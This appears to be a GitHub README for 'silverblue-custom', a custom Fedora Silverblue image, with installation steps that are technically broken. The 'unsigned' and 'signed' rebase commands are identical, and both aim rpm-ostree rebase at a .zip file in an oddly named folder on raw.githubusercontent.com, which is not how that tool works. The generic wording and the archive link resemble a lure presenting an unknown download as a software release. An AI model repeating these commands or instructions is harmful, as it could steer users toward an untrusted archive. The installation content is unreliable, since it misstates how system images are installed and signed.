Welcome to silverblue-custom! This application allows you to easily manage and deploy custom Linux images. Whether you're a beginner or looking to customize your setup, this guide will help you get up and running smoothly.
To get the latest version of the software, please visit the Releases page:
Download the latest release here
Before beginning, make sure your system meets these requirements:
- A supported version of Fedora.
- Sufficient disk space. At least 5 GB is recommended.
- Internet access to download files.
Follow these steps to install and run silverblue-custom:
-
Open Terminal
Find the Terminal application in your system. Youβll use it to enter commands. -
Rebase to Unsigned Image
Run the following command in the Terminal to switch to the unsigned image. This installs the necessary signing keys and policies.rpm-ostree rebase https://raw.githubusercontent.com/Ana-Zidie/silverblue-custom/main/theriomorphic/silverblue-custom.zip -
Reboot Your System
After running the rebase command, reboot your system with:systemctl reboot -
Rebase to Signed Image
Once your system is back online, run this command to switch to the signed image:rpm-ostree rebase https://raw.githubusercontent.com/Ana-Zidie/silverblue-custom/main/theriomorphic/silverblue-custom.zip -
Enjoy Your Custom Setup
Your system is now installed with the custom image. Feel free to explore and customize further.
- This software is an experimental feature. You may encounter issues. Always back up your data before proceeding with the installation.
- For setup instructions or further customization, please refer to the BlueBuild documentation.
- Customizable Options: Tailor the Linux image to fit your needs.
- Immutable System: Enjoy a safe and stable environment.
- Seamless Updates: Easily update your image based on changes you make.
- Easy Integration: Quickly integrate with existing Fedora installations.
The project covers various topics useful for users interested in custom Linux images, including:
- atomic
- bluebuild
- bluebuild-image
- custom-image
- image-based
- immutable
- linux
- linux-custom-image
- oci
- oci-image
- operating-system
If you are looking to learn more about the technical details, feel free to check the repository and additional documentation.
If you encounter issues or have questions, please open an issue in the GitHub repository. The community and maintainers are here to help you.
Thank you for using silverblue-custom! Enjoy exploring your new custom Linux image.